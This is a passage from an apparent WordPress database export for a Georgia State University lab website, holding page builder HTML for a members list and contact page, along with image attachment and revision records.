src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-cropped-Eliza-Schuh-e1697208271242.jpg\" class=\"wp-image-1795 style-913-image style-local-182-c206-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c206-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c207\" class=\"h-global-transition-all h-heading style-914 style-local-182-c207 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c207\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Eliza Schuh</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c208\" class=\"h-text h-text-component style-915 style-local-182-c208 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c209\" class=\"style-917 style-local-182-c209 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/search/results/all/?fetchDeterministicClustersOnly=true&amp;heroEntityKey=urn%3Ali%3Afsd_profile%3AACoAACVdt3kBua3o83BdyteC4Ssk8shnCAvZZZc&amp;keywords=eliza%20schuh&amp;origin=RICH_QUERY_TYPEAHEAD_HISTORY&amp;position=0&amp;searchId=e7657352-5ea3-4501-b984-d21542771bc4&amp;sid=WW)&amp;spellCorrectionEnabled=true\"\n                        h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c210-outer\">\n            <div data-colibri-id=\"182-c210\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c210 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c211\" class=\"d-block style-913 style-local-182-c211 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Bronson-e1697209357897.png\" class=\"wp-image-1797 style-913-image style-local-182-c211-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c211-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c212\" class=\"h-global-transition-all h-heading style-914 style-local-182-c212 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c212\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bronson Tharpe</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c213\" class=\"h-text h-text-component style-915 style-local-182-c213 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c214\" class=\"style-917 style-local-182-c214 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bronson-tharpe-9b754a1ba/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c215-outer\">\n            <div data-colibri-id=\"182-c215\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c215 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c216\" class=\"d-block style-913 style-local-182-c216 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Angelique-e1697207062254.jpg\" class=\"wp-image-1757 style-913-image style-local-182-c216-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c216-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c217\" class=\"h-global-transition-all h-heading style-914 style-local-182-c217 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c217\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Angelique Willis</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c218\" class=\"h-text h-text-component style-915 style-local-182-c218 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c219\" class=\"style-917 style-local-182-c219 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/angelique-willis/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c220-outer\">\n            <div data-colibri-id=\"182-c220\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c220 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c221\" class=\"d-block style-913 style-local-182-c221 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg\" class=\"wp-image-1763 style-913-image style-local-182-c221-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c221-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c222\" class=\"h-global-transition-all h-heading style-914 style-local-182-c222 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c222\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Joshua Quiroz</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c223\" class=\"h-text h-text-component style-915 style-local-182-c223 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c224\" class=\"style-917 style-local-182-c224 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Members','','publish','closed','closed','','members','','','2024-11-14 09:48:38','2024-11-14 14:48:38','',0,'https://gsudice.dataconn.net/?page_id=182',0,'page','',0),(183,1,'2023-09-29 11:36:36','2022-02-15 18:06:18',' ','','','publish','closed','closed','','183','','','2023-09-29 11:36:36','2023-09-29 15:36:36','',0,'https://gsudice.dataconn.net/2022/02/15/183/',5,'nav_menu_item','',0),(185,1,'2022-02-15 18:06:30','2022-02-15 18:06:30','<div data-colibri-id=\"185-c1\" class=\"style-395 style-local-185-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"185-c2\" id=\"content\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-396 style-local-185-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"185-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-397 style-local-185-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-398-outer style-local-185-c4-outer\">\n            <div data-colibri-id=\"185-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-398 style-local-185-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"185-c5\" class=\"h-global-transition-all h-heading style-400 style-local-185-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-400 style-local-185-c5\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Contact Us</h2>\n                  </div>\n                </div>\n                <div data-colibri-id=\"185-c6\" class=\"h-text h-text-component style-401 style-local-185-c6 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>We are located on the 18th Floor of 25 Park Place at the Georgia State University downtown campus.&nbsp;</p>\n                    <p>Phone:&nbsp;(404) 919-0757\n                      <br>Email: dice@cs.gsu.edu</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-406-outer style-local-185-c7-outer\">\n            <div data-colibri-id=\"185-c7\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-406 style-local-185-c7 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Contact','','publish','closed','closed','','contact','','','2022-04-08 11:45:31','2022-04-08 15:45:31','',0,'https://gsudice.dataconn.net/?page_id=185',0,'page','',0),(186,1,'2023-09-29 11:36:36','2022-02-15 18:06:30',' ','','','publish','closed','closed','','186','','','2023-09-29 11:36:36','2023-09-29 15:36:36','',0,'https://gsudice.dataconn.net/2022/02/15/186/',6,'nav_menu_item','',0),(187,1,'2022-02-15 18:06:30','2022-02-15 18:06:30','','Contact','','inherit','closed','closed','','185-revision-v1','','','2022-02-15 18:06:30','2022-02-15 18:06:30','',185,'https://gsudice.dataconn.net/?p=187',0,'revision','',0),(189,1,'2022-02-15 18:09:53','2022-02-15 18:09:53','','eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9','','inherit','open','closed','','eyj3ijoymdq4lcjoijoymdq4lcjzy29wzsi6imfwccj9','','','2022-02-15 18:09:53','2022-02-15 18:09:53','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9.webp',0,'attachment','image/webp',0),(190,1,'2022-02-15 18:10:03','2022-02-15 18:10:03','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9.webp','cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9.webp','','inherit','open','closed','','cropped-eyj3ijoymdq4lcjoijoymdq4lcjzy29wzsi6imfwccj9-webp','','','2022-02-15 18:10:03','2022-02-15 18:10:03','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9.webp',0,'attachment','image/webp',0),(191,1,'2022-02-15 18:10:20','2022-02-15 18:10:20','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp','cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp','','inherit','open','closed','','cropped-eyj3ijoymdq4lcjoijoymdq4lcjzy29wzsi6imfwccj9-1-webp','','','2022-02-15 18:10:20','2022-02-15 18:10:20','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp',0,'attachment','image/webp',0),(192,1,'2022-02-15 18:13:30','2022-02-15 18:13:30','','eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9','','inherit','open','closed','','eyj3ijoymdq4lcjoijoymdq4lcjzy29wzsi6imfwccj9-2','','','2022-02-15 18:13:30','2022-02-15 18:13:30','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp',0,'attachment','image/webp',0),(193,1,'2022-02-15 18:13:46','2022-02-15 18:13:46','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1.webp','cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1.webp','','inherit','open','closed','','cropped-eyj3ijoymdq4lcjoijoymdq4lcjzy29wzsi6imfwccj9-1-1-webp','','','2022-02-15 18:13:46','2022-02-15 18:13:46','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1.webp',0,'attachment','image/webp',0),(220,1,'2022-02-15 18:38:13','2022-02-15 18:38:13','','colibri-image-31.png','','inherit','open','closed','','colibri-image-31-png','','','2022-02-15 18:38:13','2022-02-15 18:38:13','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/colibri-image-31.png',0,'attachment','image/png',0),(249,1,'2022-02-15 22:25:44','2022-02-15 22:25:44','','Chetan-Tiwari_300x300','','inherit','open','closed','','chetan-tiwari_300x300','','','2022-02-15 22:25:44','2022-02-15 22:25:44','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/Chetan-Tiwari_300x300.jpg',0,'attachment','image/jpeg',0),(258,1,'2022-02-16 12:43:59','2022-02-16 12:43:59','','unsplash','','inherit','open','closed','','unsplash','','','2022-02-16 12:43:59','2022-02-16 12:43:59','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg',0,'attachment','image/jpeg',0),(287,1,'2022-02-16 15:40:57','2022-02-16 15:40:57','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease &amp; disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"population disparities<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 15:40:57','2022-02-16 15:40:57','',168,'https://gsudice.dataconn.net/?p=287',0,'revision','',0),(288,1,'2022-02-16 15:40:57','2022-02-16 15:40:57','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n            <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" 